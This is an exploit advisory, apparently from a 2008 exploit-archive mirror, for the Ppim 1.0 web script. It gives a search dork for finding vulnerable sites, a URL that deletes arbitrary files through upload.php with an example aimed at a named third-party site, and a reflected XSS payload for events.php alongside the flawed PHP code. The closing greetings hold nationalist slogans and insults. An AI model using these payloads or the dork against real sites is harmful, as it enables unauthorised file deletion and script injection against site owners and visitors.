Ppim <= 1.0 (Arbitrary File Delete/XSS) Multiple Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Ppim <= 1.0 (Arbitrary File Delete/XSS) Multiple Vulnerabilities
# Published : 2008-08-10
# Author : BeyazKurt
# Previous Title : Ovidentia 6.6.5 (item) Remote SQL Injection Vulnerability
# Next Title : e107 <= 0.7.11 Arbitrary Variable Overwriting Vulnerability

##########################################################
#Author : BeyazKurt
#Contact : Djm-sut@Hotmail.Com
#
#Script : Ppim v1.0 [Bu ne bicim script adidir amk :D ]
#Download : http://scripts.ringsworld.com/organizers/ppim.zip
#
# D0rk :  inurl:events.php?listallevents
#
# File Delete Vulnerability: upload.php
#
# Example:http://creawebs.com.mx/sistema/upload.php?mode=delfile&file=Creando Wiki.pptx
# Exploit:http://SITE.COM/upload.php?mode=delfile&file=FileName
#
# $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
#
# XSS Vulnerability: events.php
#
#[CODE]
#  <?php
#  if (isset($_GET['date']))
#  {
#    $date_id = $_GET['date'];
#  print "<a href="events.php?mode=new&date=$date_id">New Event</a><br / >";
#  }
#  ?>
#[/CODE]
#
#Exploit :
# events.php?mode=new&date=XSS CODE
# events.php?mode=new&date="><script>alert('XSS')</script>
# -------------------------------
#
#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
#  pigs for dedication : :  WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
#                      Proud 2 Be ALBANIAN
#
# MTK : 0 - 5 : FenerBah?§e (H)
#
# Not : Fuck off pala! aq lameri.
# Thnx : All Muslims Albanian & Turkish Coder.. And CrazyShark f0r translate.
#######################################################

# www.Syue.com [2008-08-10]